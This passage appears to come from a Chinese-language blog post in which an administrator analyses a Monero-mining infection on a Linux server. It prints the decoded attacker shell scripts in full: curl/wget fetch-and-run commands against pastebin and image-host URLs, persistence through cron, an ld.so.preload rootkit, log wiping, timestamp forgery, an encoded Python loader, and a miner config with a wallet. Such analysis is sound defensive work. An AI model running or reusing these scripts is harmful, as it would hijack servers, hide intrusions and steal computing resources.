QtdGltZW91dCAxMjAgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0M0WmhRRnJIICkKaWYgWyAke3VwZGF0ZX14ID0gInVwZGF0ZSJ4IF07dGhlbgoJcm0gLXJmIC90bXAvbG9jayogL2Jpbi9rd29ya2VyZHMgL2Jpbi9jb25maWcuanNvbiAvdG1wL2t3b3JrZXJkcyAvcm9vdC9rd29ya2VyZHMKCWVjaG9jcm9uCmVsc2UKCWlmIFsgISAtZiAiL3RtcC8udG1wYSIgXTsgdGhlbgoJCXJtIC1yZiAvdG1wLy50bXAKCQlweXRob24KCWZpCglraWxscwoJZG93bmxvYWRydW4KCWVjaG9jcm9uCglzeXN0ZW0KCXRvcAoJc2xlZXAgMTAKCXBvcnQ9JChuZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHwgd2MgLWwpCglpZiBbICR7cG9ydH0gLWVxIDAgXTt0aGVuCgkJZG93bmxvYWRydW54bQoJZmkKZmkKIwoj
- 1
base64解密后发现是这样一个shell,这个应该就是最终要干的坏事了
#!/bin/bash SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin function kills() { pkill -f sourplum pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius rm -rf /tmp/*index_bak* rm -rf /tmp/*httpd.conf* rm -rf /tmp/*httpd.conf rm -rf /tmp/a7b104c270 ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmrigDaemon" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmrigMiner" | awk '{print $2}'|xargs kill -9 pkill -f biosetjenkins pkill -f AnXqV.yam pkill -f xmrigDaemon pkill -f xmrigMiner pkill -f xmrig pkill -f Loopback pkill -f apaceha pkill -f cryptonight pkill -f stratum pkill -f mixnerdx pkill -f performedl pkill -f JnKihGjn pkill -f irqba2anc1 pkill -f irqba5xnc1 pkill -f irqbnc1 pkill -f ir29xc1 pkill -f conns pkill -f irqbalance pkill -f crypto-pool pkill -f minexmr pkill -f XJnRj pkill -f NXLAi pkill -f BI5zj pkill -f askdljlqw pkill -f minerd pkill -f minergate pkill -f Guard.sh pkill -f ysaydh pkill -f bonns pkill -f donns pkill -f kxjd pkill -f Duck.sh pkill -f bonn.sh pkill -f conn.sh pkill -f kworker34 pkill -f kw.sh pkill -f pro.sh pkill -f polkitd pkill -f acpid pkill -f icb5o pkill -f nopxi pkill -f irqbalanc1 pkill -f minerd pkill -f i586 pkill -f gddr pkill -f mstxmr pkill -f ddg.2011 pkill -f wnTKYg pkill -f deamon pkill -f disk_genius pkill -f sourplum pkill -f bashx pkill -f bashg pkill -f bashe pkill -f bashf pkill -f bashh pkill -f XbashY pkill -f libapache rm -rf /tmp/httpd.conf rm -rf /tmp/conn rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache rm -rf /tmp/conns rm -f /tmp/irq.sh rm -f /tmp/irqbalanc1 rm -f /tmp/irq rm -f /tmp/kworkerds /bin/kworkerds /bin/config.json netstat -anp | grep 69.28.55.86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep 3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep 4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep 5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep 6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep 7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep 3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep 14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep 5.196.225.222 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 y=$(ps aux | grep -v grep | grep kworkerds | wc -l ) if [ ${y} -eq 0 ];then netstat -anp | grep 13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 fi } function system() { if [ ! -f "/bin/httpdns" ]; then curl -fsSL https://pastebin.com/raw/698D7kZU -o /bin/httpdns && chmod 755 /bin/httpdns if [ ! -f "/bin/httpdns" ]; then wget https://pastebin.com/raw/698D7kZU -O /bin/httpdns && chmod 755 /bin/httpdns fi sed -i '$d' /etc/crontab && echo -e "* */6 * * * root /bin/sh /bin/httpdns" >> /etc/crontab fi } function top() { if [ ! -f "/usr/local/lib/libntp.so" ]; then curl -fsSL http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -o /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so if [ ! -f "/usr/local/lib/libntp.so" ]; then wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -O /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so fi fi if [ ! -f "/etc/ld.so.preload" ]; then echo /usr/local/lib/libntp.so > /etc/ld.so.preload else sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libntp.so >> /etc/ld.so.preload fi touch -acmr /bin/sh /etc/ld.so.preload touch -acmr /bin/sh /usr/local/lib/libjdk.so touch -acmr /bin/sh /usr/local/lib/libntp.so echo 0>/var/spool/mail/root echo 0>/var/log/wtmp echo 0>/var/log/secure echo 0>/var/log/cron } function python() { nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 & touch /tmp/.tmpa } function echocron() { echo -e "*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /etc/cron.d/root echo -e "*/30 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo -e "* */10 * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/crontabs/root touch -acmr /bin/sh /etc/cron.d/root touch -acmr /bin/sh /var/spool/cron/crontabs touch -acmr /bin/sh /var/spool/cron/root touch -acmr /bin/sh /var/spool/cron/crontabs/root } function downloadrun() { ps=$(netstat -anp | grep 13531 | wc -l) if [ ${ps} -eq 0 ];then if [ ! -f "/tmp/kworkerds" ]; then curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds if [ ! -f "/tmp/kworkerds" ]; then wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds fi nohup /tmp/kworkerds >/dev/null 2>&1 & else nohup /tmp/kworkerds >/dev/null 2>&1 & fi fi } function downloadrunxm() { pm=$(netstat -anp | grep 13531 | wc -l) if [ ${pm} -eq 0 ];then if [ ! -f "/bin/config.json" ]; then curl -fsSL http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json if [ ! -f "/bin/config.json" ]; then wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json fi fi if [ ! -f "/bin/kworkerds" ]; then curl -fsSL http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds if [ ! -f "/bin/kworkerds" ]; then wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds fi nohup /bin/kworkerds >/dev/null 2>&1 & else nohup /bin/kworkerds >/dev/null 2>&1 & fi fi } update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH ) if [ ${update}x = "update"x ];then rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds echocron else if [ ! -f "/tmp/.tmpa" ]; then rm -rf /tmp/.tmp python fi kills downloadrun echocron system top sleep 10 port=$(netstat -anp | grep 13531 | wc -l) if [ ${port} -eq 0 ];then downloadrunxm fi fi # #
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
- 89
- 90
- 91
- 92
- 93
- 94
- 95
- 96
- 97
- 98
- 99
- 100
- 101
- 102
- 103
- 104
- 105
- 106
- 107
- 108
- 109
- 110
- 111
- 112
- 113
- 114
- 115
- 116
- 117
- 118
- 119
- 120
- 121
- 122
- 123
- 124
- 125
- 126
- 127
- 128
- 129
- 130
- 131
- 132
- 133
- 134
- 135
- 136
- 137
- 138
- 139
- 140
- 141
- 142
- 143
- 144
- 145
- 146
- 147
- 148
- 149
- 150
- 151
- 152
- 153
- 154
- 155
- 156
- 157
- 158
- 159
- 160
- 161
- 162
- 163
- 164
- 165
- 166
- 167
- 168
- 169
- 170
- 171
- 172
- 173
- 174
- 175
- 176
- 177
- 178
- 179
- 180
- 181
- 182
- 183
- 184
- 185
- 186
- 187
- 188
- 189
- 190
- 191
- 192
- 193
- 194
- 195
- 196
- 197
- 198
- 199
- 200
- 201
- 202
- 203
- 204
- 205
- 206
- 207
- 208
- 209
- 210
- 211
- 212
这个shell就比较复杂了,一个一个来分析吧,从上到下看看他封装的shell方法吧
- kills
找到一堆进程并杀掉 - system
把的https://pastebin.com/raw/698D7kZU内容/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/kDSLjxfQ|/usr/bin/base64 -d|/bin/bash保存到 /bin/httpdns 文件并给他赋权限
https://pastebin.com/raw/kDSLjxfQ又是一个base64 `
IyEvYmluL3NoClNIRUxMPS9iaW4vc2gKUEFUSD0vdXNyL2xvY2FsL3NiaW46L3Vzci9sb2NhbC9iaW46L3NiaW46L2JpbjovdXNyL3NiaW46L3Vzci9iaW4KCmZ1bmN0aW9uIGRvd25sb2FkcnVuKCkgewoJcHM9JChuZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHwgd2MgLWwpCglpZiBbICR7cHN9IC1lcSAwIF07dGhlbgoJCWlmIFsgISAtZiAiL3RtcC9rd29ya2VyZHMiIF07IHRoZW4KCQkJY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cDovL3RoeXJzaS5jb20vdDYvMzU4LzE1MzQ0OTUxMjd4LTE0MDQ3NjQyNDcuanBnIC1vIC90bXAva3dvcmtlcmRzICYmIGNobW9kICt4IC90bXAva3dvcmtlcmRzCgkJCWlmIFsgISAtZiAiL3RtcC9rd29ya2VyZHMiIF07IHRoZW4KCQkJCXdnZXQgaHR0cDovL3RoeXJzaS5jb20vdDYvMzU4LzE1MzQ0OTUxMjd4LTE0MDQ3NjQyNDcuanBnIC1PIC90bXAva3dvcmtlcmRzICYmIGNobW9kICt4IC90bXAva3dvcmtlcmRzCgkJCWZpCgkJCQlub2h1cCAvdG1wL2t3b3JrZXJkcyA+L2Rldi9udWxsIDI+JjEgJgoJCWVsc2UKCQkJbm9odXAgL3RtcC9rd29ya2VyZHMgPi9kZXYvbnVsbCAyPiYxICYKCQlmaQoJZmkKfQoKZnVuY3Rpb24gZG93bmxvYWRydW54bSgpIHsKCXBtPSQobmV0c3RhdCAtYW5wIHwgZ3JlcCAxMzUzMSB8IHdjIC1sKQoJaWYgWyAke3BtfSAtZXEgMCBdO3RoZW4KCQlpZiBbICEgLWYgIi9iaW4vY29uZmlnLmpzb24iIF07IHRoZW4KCQkJY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cDovL3RoeXJzaS5jb20vdDYvMzU4LzE1MzQ0OTYwMjJ4LTE0MDQ3NjQ1ODMuanBnIC1vIC9iaW4vY29uZmlnLmpzb24gJiYgY2htb2QgK3ggL2Jpbi9jb25maWcuanNvbgoJCQlpZiBbICEgLWYgIi9iaW4vY29uZmlnLmpzb24iIF07IHRoZW4KCQkJCXdnZXQgaHR0cDovL3RoeXJzaS5jb20vdDYvMzU4LzE1MzQ0OTYwMjJ4LTE0MDQ3NjQ1ODMuanBnIC1PIC9iaW4vY29uZmlnLmpzb24gJiYgY2htb2QgK3ggL2Jpbi9jb25maWcuanNvbgoJCQlmaQoJCWZpCgkJaWYgWyAhIC1mICIvYmluL2t3b3JrZXJkcyIgXTsgdGhlbgoJCQljdXJsIC1mc1NMIC0tY29ubmVjdC10aW1lb3V0IDEyMCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5MTc5OHgtMTQwNDc2NDQyMC5qcGcgLW8gL2Jpbi9rd29ya2VyZHMgJiYgY2htb2QgK3ggL2Jpbi9rd29ya2VyZHMKCQkJaWYgWyAhIC1mICIvYmluL2t3b3JrZXJkcyIgXTsgdGhlbgoJCQkJd2dldCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5MTc5OHgtMTQwNDc2NDQyMC5qcGcgLU8gL2Jpbi9rd29ya2VyZHMgJiYgY2htb2QgK3ggL2Jpbi9rd29ya2VyZHMKCQkJZmkKCQkJCW5vaHVwIC9iaW4va3dvcmtlcmRzID4vZGV2L251bGwgMj4mMSAmCgkJZWxzZQoJCQlub2h1cCAvYmluL2t3b3JrZXJkcyA+L2Rldi9udWxsIDI+JjEgJgoJCWZpCglmaQp9CgpmdW5jdGlvbiBpbml0KCkgewoJaWYgWyAhIC1mICIvdXNyL3NiaW4va3dvcmtlciIgXTsgdGhlbgoJCWN1cmwgLWZzU0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHA6Ly90aHlyc2kuY29tL3Q2LzM2Mi8xNTM1MTc1MDE1eC0xNDA0ODE3ODgwLmpwZyAtbyAvdXNyL3NiaW4va3dvcmtlciAmJiBjaG1vZCA3NzcgL3Vzci9zYmluL2t3b3JrZXIKCQlpZiBbICEgLWYgIi91c3Ivc2Jpbi9rd29ya2VyIiBdOyB0aGVuCgkJCXdnZXQgaHR0cDovL3RoeXJzaS5jb20vdDYvMzYyLzE1MzUxNzUwMTV4LTE0MDQ4MTc4ODAuanBnIC1PIC91c3Ivc2Jpbi9rd29ya2VyICYmIGNobW9kIDc3NyAvdXNyL3NiaW4va3dvcmtlcgoJCWZpCglmaQoJaWYgWyAhIC1mICIvZXRjL2luaXQuZC9rd29ya2VyIiBdOyB0aGVuCgkJY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cDovL3RoeXJzaS5jb20vdDYvMzYyLzE1MzUxNzUzNDN4LTE1NjY2NTc2NzUuanBnIC1vIC9ldGMvaW5pdC5kL2t3b3JrZXIgJiYgY2htb2QgNzc3IC9ldGMvaW5pdC5kL2t3b3JrZXIKCQlpZiBbICEgLWYgIi9ldGMvaW5pdC5kL2t3b3JrZXIiIF07IHRoZW4KCQkJd2dldCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNjIvMTUzNTE3NTM0M3gtMTU2NjY1NzY3NS5qcGcgLU8gL2V0Yy9pbml0LmQva3dvcmtlciAmJiBjaG1vZCA3NzcgL2V0Yy9pbml0LmQva3dvcmtlcgoJCWZpCglmaQoJY2hrY29uZmlnIC0tYWRkIGt3b3JrZXIKfQoKZnVuY3Rpb24gZWNob2Nyb24oKSB7CgllY2hvIC1lICIqLzEwICogKiAqICogcm9vdCAvdXNyL2Jpbi9jdXJsIGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy94Ylk3cDVUYnxzaFxuIyMiID4gL2V0Yy9jcm9uLmQvcm9vdAoJZWNobyAtZSAiKi8zMCAqICogKiAqCS91c3IvYmluL2N1cmwgLWZzU0wgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3hiWTdwNVRifHNoXG4jIyIgPiAvdmFyL3Nwb29sL2Nyb24vcm9vdAoJbWtkaXIgLXAgL3Zhci9zcG9vbC9jcm9uL2Nyb250YWJzCgllY2hvIC1lICIqICovMTAgKiAqICoJL3Vzci9iaW4vY3VybCAtZnNTTCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcveGJZN3A1VGJ8c2hcbiMjIiA+IC92YXIvc3Bvb2wvY3Jvbi9jcm9udGFicy9yb290Cn0KCgp1cGRhdGU9JCggY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0M0WmhRRnJIICkKaWYgWyAke3VwZGF0ZX14ID0gInVwZGF0ZSJ4IF07dGhlbgoJcm0gLXJmIC90bXAvbG9jayogL2Jpbi9rd29ya2VyZHMgL2Jpbi9jb25maWcuanNvbiAvdG1wL2t3b3JrZXJkcyAvcm9vdC9rd29ya2VyZHMKCWVjaG9jcm9uCmVsc2UKCWRvd25sb2FkcnVuCglpbml0CgllY2hvY3JvbgoJc2xlZXAgMTAKCXBvcnQ9JChuZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHwgd2MgLWwpCglpZiBbICR7cG9ydH0gLWVxIDAgXTt0aGVuCgkJZG93bmxvYWRydW54bQoJZmkKZmkKIwoj ```  解码之后是 ```shell #!/bin/sh SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin function downloadrun() { ps=$(netstat -anp | grep 13531 | wc -l) if [ ${ps} -eq 0 ];then if [ ! -f "/tmp/kworkerds" ]; then curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds if [ ! -f "/tmp/kworkerds" ]; then wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds fi nohup /tmp/kworkerds >/dev/null 2>&1 & else nohup /tmp/kworkerds >/dev/null 2>&1 & fi fi } function downloadrunxm() { pm=$(netstat -anp | grep 13531 | wc -l) if [ ${pm} -eq 0 ];then if [ ! -f "/bin/config.json" ]; then curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json if [ ! -f "/bin/config.json" ]; then wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json fi fi if [ ! -f "/bin/kworkerds" ]; then curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds if [ ! -f "/bin/kworkerds" ]; then wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds fi nohup /bin/kworkerds >/dev/null 2>&1 & else nohup /bin/kworkerds >/dev/null 2>&1 & fi fi } function init() { if [ ! -f "/usr/sbin/kworker" ]; then curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -o /usr/sbin/kworker && chmod 777 /usr/sbin/kworker if [ ! -f "/usr/sbin/kworker" ]; then wget http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -O /usr/sbin/kworker && chmod 777 /usr/sbin/kworker fi fi if [ ! -f "/etc/init.d/kworker" ]; then curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -o /etc/init.d/kworker && chmod 777 /etc/init.d/kworker if [ ! -f "/etc/init.d/kworker" ]; then wget http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -O /etc/init.d/kworker && chmod 777 /etc/init.d/kworker fi fi chkconfig --add kworker } function echocron() { echo -e "*/10 * * * * root /usr/bin/curl https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /etc/cron.d/root echo -e "*/30 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo -e "* */10 * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/crontabs/root } update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH ) if [ ${update}x = "update"x ];then rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds echocron else downloadrun init echocron sleep 10 port=$(netstat -anp | grep 13531 | wc -l) if [ ${port} -eq 0 ];then downloadrunxm fi fi # #
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
这个等会再分析
- top
把这个http://thyrsi.com/t6/365/1535595427x-1404817712.jpg图片保存到服务器的/usr/local/lib/libntp.so(同事保存到/etc/ld.so.preload)并赋权限,这个看似一个图片其实应该是个动态链接库具体有什么作用还不太清楚,但是凭感觉没有干什么好事,然后把他刚创建的这几个文件/etc/ld.so.preload``/usr/local/lib/libjdk.so``/usr/local/lib/libntp.so的修改时间变得和/bin/sh一样(真是大大的坏) - python
后台运行python程序python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))"这个就是最开始查到的python进程(原来是在这被启动的) - echocron
把类似这样的定时任务写到了三个crontabs的配置文件里面"*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##"分别是/etc/cron.d/root/var/spool/cron/root/var/spool/cron/crontabs/root, 同样把他们的修改时间变得和/bin/sh一样 - downloadrun
把http://thyrsi.com/t6/358/1534495127x-1404764247.jpg的内容保存到/tmp/kworkerds并赋权限 然后后台执行/tmp/kworkerds这个应该是个可执行文件 但是不是一个shell,但是干掉一个也不是什么好事 - downloadrunxm
把http://thyrsi.com/t6/358/1534496022x-1404764583.jpg的内容保存到/bin/config.json并赋权限,这是一个json
{ "algo": "cryptonight", "api": { "port": 0, "access-token": null, "worker-id": null, "ipv6": false, "restricted": true }, "av": 0, "background": false, "colors": true, "cpu-affinity": null, "cpu-priority": null, "donate-level": 0, "huge-pages": true, "hw-aes": null, "log-file": null, "max-cpu-usage": 100, "pools": [ { "url": "stratum+tcp://xmr.f2pool.com:13531", "user": "47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.xmrig", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": false, "variant": 1 } ], "print-time": 60, "retries": 5, "retry-pause": 5, "safe": false, "threads": null, "user-agent": null, "watch": false }
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
没有看到哪里使用了,但是应该是和之前的动态链接库和可执行文件有关,同时把http://thyrsi.com/t6/358/1534491798x-1404764420.jpg的内容保存到/bin/kworkerds并赋权限,然后后台执行 /tmp/kworkerds
-
分析这个shell脚本
脚本封装的一些方法基本分析完了,看看这个脚本干了什么事情:先kills杀掉一堆进程,然后downloadrun下载一个可执行文件并后台运行,再echocron写了一堆定时任务,再system下载了动态链接库,然后top下载一个动态链接库并同步到/etc/ld.so.preload植入了预加载型恶意动态链接库后门,休息10s后downloadrunxm下载config.json,下载可执行文件/bin/kworkerds并后台运行 -
这个shell分析完了再看看
system方法里面出现的那个shell
#!/bin/sh SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin function downloadrun() { ps=$(netstat -anp | grep 13531 | wc -l) if [ ${ps} -eq 0 ];then if [ ! -f "/tmp/kworkerds" ]; then curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds if [ ! -f "/tmp/kworkerds" ]; then wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds fi nohup /tmp/kworkerds >/dev/null 2>&1 & else nohup /tmp/kworkerds >/dev/null 2>&1 & fi fi } function downloadrunxm() { pm=$(netstat -anp | grep 13531 | wc -l) if [ ${pm} -eq 0 ];then if [ ! -f "/bin/config.json" ]; then curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json if [ ! -f "/bin/config.json" ]; then wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json fi fi if [ ! -f "/bin/kworkerds" ]; then curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds if [ ! -f "/bin/kworkerds" ]; then wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds fi nohup /bin/kworkerds >/dev/null 2>&1 & else nohup /bin/kworkerds >/dev/null 2>&1 & fi fi } function init() { if [ ! -f "/usr/sbin/kworker" ]; then curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -o /usr/sbin/kworker && chmod 777 /usr/sbin/kworker if [ ! -f "/usr/sbin/kworker" ]; then wget http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -O /usr/sbin/kworker && chmod 777 /usr/sbin/kworker fi fi if [ ! -f "/etc/init.d/kworker" ]; then curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -o /etc/init.d/kworker && chmod 777 /etc/init.d/kworker if [ ! -f "/etc/init.d/kworker" ]; then wget http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -O /etc/init.d/kworker && chmod 777 /etc/init.d/kworker fi fi chkconfig --add kworker } function echocron() { echo -e "*/10 * * * * root /usr/bin/curl https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /etc/cron.d/root echo -e "*/30 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo -e "* */10 * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/crontabs/root } update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH ) if [ ${update}x = "update"x ];then rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds echocron else downloadrun init echocron sleep 10 port=$(netstat -anp | grep 13531 | wc -l) if [ ${port} -eq 0 ];then downloadrunxm fi fi # #
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
